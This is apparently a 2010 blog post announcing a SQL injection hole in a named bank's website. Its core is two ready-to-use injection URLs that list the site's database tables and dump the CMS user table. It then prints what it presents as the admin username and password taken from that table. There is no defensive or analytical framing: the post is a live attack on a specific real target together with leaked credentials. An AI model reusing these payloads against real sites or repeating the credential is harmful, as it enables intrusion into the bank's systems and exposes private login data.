#Title: prvabankacg.com SQL Injection Vulnerability
#Risk: (5/5)
#Release Date: 12.09.2010
#Vulnerability discovered by: darknessn1k0!a
---------------------------------------------------------------------
http://www.prvabankacg.com/index.php?language_id=-2%20union%20all%20select%20group_concat(table_name)+from+information_schema.tables+where+table_schema=database()--
http://www.prvabankacg.com/index.php?language_id=-2%20union%20all%20select%20group_concat(cms_username,0x3a,cms_password)+from+cms_user--
+++++++++++++++++++++++++++++++++++++++++
+Username:admin password:sc682aa714 +
+++++++++++++++++++++++++++++++++++++++++
Saturday, September 11, 2010
prvabankacg.com SQL Injection Vulnerability [live full injection]
0
About Me
- За Zer0-0ne
- Блог за истражување и развој на информациска безбедност, кој е наменет за постирање на најнови ранливости и слабости. Founder darknessn1k0!4
0 comments:
Post a Comment